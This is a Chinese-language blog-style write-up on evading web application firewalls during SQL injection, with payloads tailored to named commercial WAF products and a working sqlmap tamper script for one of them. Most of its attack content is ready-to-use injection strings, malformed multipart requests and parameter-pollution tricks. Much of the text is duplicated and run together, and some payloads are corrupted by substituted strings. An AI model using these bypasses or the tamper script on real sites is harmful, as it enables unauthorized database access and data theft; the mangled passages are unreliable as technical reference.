0x0前言0x1注入點檢測0x2 bypass waf0x3自動化
0x0前言
這裡是簡單對sql注入繞過waf的一個小總結,非安全研究員,這裡不講原理,關於原理蒐集了一些其他大佬的文章(文章在最下麵請自取),感謝他們的分享,比著葫蘆畫瓢,對著各大waf廠商跟著師傅們來一波實戰,進行一個簡單的總結。
0x1注入點檢測
一般的注入還是很好判斷的,特別是基於報錯,但有的時候略微有些奇葩的環境,再加上一些亂七八糟waf,就比較難搞了,這裡簡單總結了一些方法。
- 利用資料庫獨有的一些函數access asc chr len #access-functionsmysql substring substr lengthmssql char ascii len substring #mssql function stroracle ascii chr length substr upper lower replace(x,old,new)這些資料庫中一個通用的函數就是abs,如果覺得是int型注入不妨先試試2-abs(1),然後結合各類資料庫的一些函數來判斷是什麼資料庫的注入,當然對資料庫瞭解越多越好。
利用資料庫獨有的一些函數access asc chr len #access-functionsmysql substring substr lengthmssql char ascii len substring #mssql function stroracle ascii chr length substr upper lower replace(x,old,new)這些資料庫中一個通用的函數就是abs,如果覺得是int型注入不妨先試試2-abs(1),然後結合各類資料庫的一些函數來判斷是什麼資料庫的注入,當然對資料庫瞭解越多越好。
- 改變請求管道根據經驗,一般情况下各腳本對http request method如下,這裡以GET為例子,針對www.vul.com/?id=1來進行判斷。php GETaspx GETasp GET POST COOKIEjsp GET POST平常滲透測試中總是遇到各種各樣的waf,有的時候一個單引號就死了,這個時候首選的一些方法就是轉換請求頭了,畢竟GET不如POST,POST不如multipart/form-data,當然不要看到php就不去轉換,任何情况下都要嘗試一下。當然,可以用burp很方便的來進行change request method以及change body encoding。
改變請求管道根據經驗,一般情况下各腳本對http request method如下,這裡以GET為例子,針對www.vul.com/?id=1來進行判斷。php GETaspx GETasp GET POST COOKIEjsp GET POST平常滲透測試中總是遇到各種各樣的waf,有的時候一個單引號就死了,這個時候首選的一些方法就是轉換請求頭了,畢竟GET不如POST,POST不如multipart/form-data,當然不要看到php就不去轉換,任何情况下都要嘗試一下。當然,可以用burp很方便的來進行change request method以及change body encoding。
之前碰到過一個有趣的例子,asp的網站可以通過cookie提交數據,而且可以使用len函數,可以初步判斷為access或者mssql資料庫,但是還是很頭疼,最後一比特大哥使用下麵的函數可以判斷成功。www.vul.com/2.asp?id=482 483-chr(chr(52)&chr(57))#=482 chr(52)'4' chr(57)'9' chr(49)'1' #chr(52)&chr(57)為49 chr(49)為1雖然最後也沒什麼卵用但還是挺有意思的
- 資料庫特性mysql注釋符號# --+ `;%00 //字串可以使用成對的引號'admin' = admin'''mssql注釋符號-- //;%00oracle注釋符號-- /**/ admin=adm'||'in空白符號MySQL5 09 0A 0B 0C 0D A0 20Oracle 00 0A 0D 0C 09 20MSSQL 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20mysql和mssql可以使用|來進行相關的運算,而oracle會把||當成連接字元。
資料庫特性mysql注釋符號# --+ `;%00 //字串可以使用成對的引號'admin' = admin'''mssql注釋符號-- //;%00oracle注釋符號-- /**/ admin=adm'||'in空白符號MySQL5 09 0A 0B 0C 0D A0 20Oracle 00 0A 0D 0C 09 20MSSQL 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20mysql和mssql可以使用|來進行相關的運算,而oracle會把||當成連接字元。
- web容器特性這裡直接可以跳過看http://drops.xmd5.com/static/drops/tips-7883.html這篇文章
web容器特性這裡直接可以跳過看http://drops.xmd5.com/static/drops/tips-7883.html這篇文章
1. iis+asp(x)
1.%u特性: iis支持对unicode的解析,如:payload为[s%u006c%u0006ect],解析出来后则是[select]
%u0061nd 1=1
另类%u特性: unicode在iis解析之后会被转换成multibyte,但是转换的过程中可能出现:多个widechar可能会转换为同一个字符。
如:select中的e对应的unicode为%u0065,但是%u00f0同样会被转换成为e s%u00f0lect
iis+asp
2.%特性: union selec%t user fr%om dd #iis+asp asp+iis环境下会忽略掉百分号,如:payload为[sele%ct], 解析出来后则是[select]
3.asp/asp.net在解析请求的时候,允许Content-Type: application/x-www-form-urlencoded的数据提交方式select%201%20from%20user
asp/asp.net request解析:
4.在asp和asp.net中获取用户的提交的参数一般使用request包,当使用request(‘id’)的形式获取包的时候,会出现GET,POST分不清的情况,譬如可以构造一个请求包,METHOD为GET,但是包中还带有POST的内容和POST的content-type, 换一种理解方式也就是将原本的post数据包的method改成GET,如果使用request(‘id’)方式获取数据,仍会获取到post的内容
2. php+apache畸形的boundary
1.php在解析multipart data的时候有自己的特性,对于boundary的识别,只取了逗号前面的内容,例如我们设置的boundary为—-aaaa,123456,php解析的时候只识别了—-aaaa,后面的内容均没有识别。然而其他的如WAF在做解析的时候,有可能获取的是整个字符串,此时可能就会出现BYPASS
Content-Type: multipart/form-data; boundary=------,xxxx
Content-Length: 191
------,xxxx
Content-Disposition: form-data; name="img"; filename="img.gif"
GIF89a
------
Content-Disposition: form-data; name="id"
1' union select null,null,flag,null from flag limit 1 offset 1-- -
--------
------,xxxx--
2.畸形method(header头中)
某些apache版本在做GET请求的时候,无论method为何值均会取出GET的内容。如请求的method名为DOTA,依然会返回GET方法的值,即,可以任意替换GET方法为其它值,但仍能有效工作,但如果waf严格按照GET方法取值,则取不到任何内容
3. web应用层
1.双重URL编码: 即web应用层在接受到经过服务器层解码后的参数后,又进行了一次URL解码
2.变换请求方式:
在web应用中使用了统一获取参数的方式: 如php里使用$_REQUEST获取参数,但WAF层如果过滤不全则容易bypass,如,waf层过滤了get/post,但没有过滤cookie,而web应用层并不关心参数是否来自cookie
urlencode和form-data: POST在提交数据的时候有两种方式,第一种方式是使用urlencode的方式提交,第二种方式是使用form-data的方式提交。当我们在测试的时候,如果发现POST提交的数据被过滤掉了,此时可以考虑使用form-data的方式去提交
4. hpp
asp.net + iis:id=1,2,3 #?str=a%27/*&str=*/and/*&str=*/@@version=0--
asp + iis :id=1,2,3
php + apache :id=3
jsp + tomcat :id=1
這裡提供一種針對普通檢測的方法,大家可自行發揮。mysql int型:%20%26%201=1 mysql.php?id=1%20%26%201=1另外在字元型中'and'1'='1是不需要加空格的,有時候也可以繞過一些waf判斷
0x2 bypasswaf
由於mysql的靈活性,這裡以mysql繞過為主,針對各大主流waf廠商進行一個測試,主要測試線上版的,本地就安裝了一個360主機衛士。其中http://192.168.44.132/mysql.php?id=1是我本地的一個測試環境其中下麵的繞過都是以fuzz為主,不考慮web容器的特性,嘗試繞過聯合査詢-1 union select 1,2,3 from dual
- 百度雲加速bypassunion select #filterfrom dual #not filtedselect from dual #filter只需要繞過select即可使用--+aaaaaa%0a可bypass
- 360主機衛士bypass發現%23%0aand%230a1=1可以繞過and 1=1限制最後在union select from的時候卻繞不過去直接使用大字串來fuzz %23-FUZZ-%0a https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt發現可以成功繞過waf
- 雲鎖union select如下就可以繞過http://www.yunsuo.com.cn/download.html?id=1%20union/*!/*!select%201,2,3*/轉換成multiform/data可輕鬆繞過
- 安全狗bypass直接搞就行了當然也可以chunked提交
- 阿裡雲嘗試使用自定義變數管道來繞過@a:=(select @b:=table_namefrom{a information_schema.TABLES }limit 0,1)union select '1',@[email protected]:=(select)被過濾fuzz下p參數使用@$:=(select)可以繞過union select 1被過濾使用union %23aa%0a/!select--%01%0a/1,@$,3可以繞過發現重點就是繞過錶名select 1 from dual一些常規的方法測試無果隨便fuzz下注釋/!數位/卻偶然發現有倆個數据包遺漏想起了以前烏雲上一哥的的一個漏洞https://wooyun.shuimugan.com/bug/view?bug_no=94367難道是因為訪問頻率導致遺漏?隨即我又進行了一些fuzz fuzz1w到5w數字型的注釋加大線程發現遺漏了更多我想測試一下之前的waf挑戰賽,發現之前提交的payload已經修復了,而且那個漏洞url無法訪問了:(所以無法確認。隨即我又進行了一些超長字串的fuzz簡單fuzz1w-10w以500為step發現現象更多了可初步判斷存在遺漏### 0x3自動化以360主機衛士為例,編寫sqlmap tamper腳本。正常無waf sqlmap聯合査詢如下:開啟主機衛士,放到瀏覽器調試,修改相關payload使其能正常運行。最後tamper腳本如下:from lib.core.enums import PRIORITYfrom lib.core.settings import UNICODE_ENCODING__priority__ = PRIORITY.LOWdef dependencies():passdef tamper(payload,**kwargs):“”“Replaces keywords >>> tamper('UNION SELECT id FROM users')'1 union%23!@%23$%%5e%26%2a()%60~%0a/*!12345select*/ NULL,/*!12345CONCAT*/(0x7170706271,IFNULL(/*!12345CASt(*/COUNT(*)AS CHAR),0x20),0x7171786b71),NULL/*!%23!@%23$%%5e%26%2a()%60~%0afrOm*/INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e AND table_schema=0x73716c696e6a656374--“”“if payload: payload=payload.replace(”UNION ALL SELECT“,“union%23!@%23$%%5e%26%2a()%60~%0a/*!12345select*/”)payload=payload.replace(“UNION SELECT”,“union%23!@%23$%%5e%26%2a()%60~%0a/*!12345select*/”)payload=payload.replace(“FROM”,“/*!%23!@%23$%%5e%26%2a()%60~%0afrOm*/”)payload=payload.replace(“CONCAT”,“/*!12345CONCAT*/”)payload=payload.replace(“CAST(”,“/*!12345CAST(*/”)payload=payload.replace(“CASE”,“/*!12345CASE*/”)payload=payload.replace(“DATABASE()”,“database/**/()”)return payload可以成功獲取到相關資料。其他參攷連結如下:http://www.anquan.us/search?keywords=bypass&content_search_by=by_bugshttp://drops.xmd5.com/static/drops/tips-7883.htmlhttps://xianzhi.aliyun.com/forum/attachment/big_size/wafbypass_sql.pdfhttp://drops.xmd5.com/static/drops/ papers-4323.html https://www.cnblogs.com/xiaozi/p/6927348.htmlhttp://swende.se/blog/HTTPChunked.html# https://xz.aliyun.com/t/1239http://www.sqlinjectionwiki.com/categories/2/mysql-sql-injection-cheat-sheet/ https://mp.weixin.qq.com/s/S318-e4-eskfRG38HZk_Qw https://joychou.org/web/ nginx-Lua-waf-general-bypass-method.html #nginx lua waf https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAFhttps://websec.ca/kb/sql_injection#MySQL_Comment_Out_Query https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423
阿裡雲嘗試使用自定義變數管道來繞過@a:=(select @b:=table_namefrom{a information_schema.TABLES }limit 0,1)union select '1',@[email protected]:=(select)被過濾fuzz下p參數使用@$:=(select)可以繞過union select 1被過濾使用union %23aa%0a/!select--%01%0a/1,@$,3可以繞過發現重點就是繞過錶名select 1 from dual一些常規的方法測試無果隨便fuzz下注釋/!數位/卻偶然發現有倆個數据包遺漏想起了以前烏雲上一哥的的一個漏洞https://wooyun.shuimugan.com/bug/view?bug_no=94367難道是因為訪問頻率導致遺漏?隨即我又進行了一些fuzz fuzz1w到5w數字型的注釋加大線程發現遺漏了更多我想測試一下之前的waf挑戰賽,發現之前提交的payload已經修復了,而且那個漏洞url無法訪問了:(所以無法確認。隨即我又進行了一些超長字串的fuzz簡單fuzz1w-10w以500為step發現現象更多了可初步判斷存在遺漏### 0x3自動化以360主機衛士為例,編寫sqlmap tamper腳本。正常無waf sqlmap聯合査詢如下:開啟主機衛士,放到瀏覽器調試,修改相關payload使其能正常運行。最後tamper腳本如下:
table_name
TABLES
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces keywords
>>> tamper('UNION SELECT id FROM users')
'1 union%[email protected]%23$%%5e%26%2a()%60~%0a/*!12345select*/ NULL,/*!12345CONCAT*/(0x7170706271,IFNULL(/*!12345CASt(*/COUNT(*) AS CHAR),0x20),0x7171786b71),NULL/*!%[email protected]%23$%%5e%26%2a()%60~%0afrOm*/INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e AND table_schema=0x73716c696e6a656374--
"""
if payload:
payload=payload.replace("UNION ALL SELECT","union%[email protected]%23$%%5e%26%2a()%60~%0a/*!12345select*/")
payload=payload.replace("UNION SELECT","union%[email protected]%23$%%5e%26%2a()%60~%0a/*!12345select*/")
payload=payload.replace(" FROM ","/*!%[email protected]%23$%%5e%26%2a()%60~%0afrOm*/")
payload=payload.replace("CONCAT","/*!12345CONCAT*/")
payload=payload.replace("CAST(","/*!12345CAST(*/")
payload=payload.replace("CASE","/*!12345CASE*/")
payload=payload.replace("DATABASE()","database/**/()")
return payload
可以成功獲取到相關資料。其他參攷連結如下:
http://www.anquan.us/search?keywords=bypass&content_search_by=by_bugs
http://drops.xmd5.com/static/drops/tips-7883.html
https://xianzhi.aliyun.com/forum/attachment/big_size/wafbypass_sql.pdf
http://drops.xmd5.com/static/drops/papers-4323.html
https://www.cnblogs.com/xiaozi/p/6927348.html
http://swende.se/blog/HTTPChunked.html#
https://xz.aliyun.com/t/1239
http://www.sqlinjectionwiki.com/categories/2/mysql-sql-injection-cheat-sheet/
https://mp.weixin.qq.com/s/S318-e4-eskfRG38HZk_Qw
https://joychou.org/web/nginx-Lua-waf-general-bypass-method.html #nginx lua waf
https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
https://websec.ca/kb/sql_injection#MySQL_Comment_Out_Query
https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423